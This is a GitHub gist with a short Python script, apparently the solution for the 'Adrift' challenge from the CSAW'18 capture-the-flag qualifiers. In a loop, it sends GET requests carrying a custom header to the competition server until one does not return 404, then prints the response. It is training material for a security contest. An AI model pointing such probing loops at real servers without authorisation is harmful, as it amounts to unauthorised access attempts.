Skip to content

Instantly share code, notes, and snippets.

@swedgwood
Created October 3, 2018 14:47
Show Gist options
  • Save swedgwood/a7feef3d873ba1279f2bb957615566d4 to your computer and use it in GitHub Desktop.
Save swedgwood/a7feef3d873ba1279f2bb957615566d4 to your computer and use it in GitHub Desktop.
Script for challenge 'Adrift' from the CSAW'18 RTC Qualifiers.
import requests as rq
url = "http://web.chal.csaw.io:10106"
headers = {
"bring_back_random_click": "aaaaaaaaaa"
}
while True:
req = rq.get(url+"/default/", headers=headers)
if req.status_code != 404:
print(req.text)
break
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment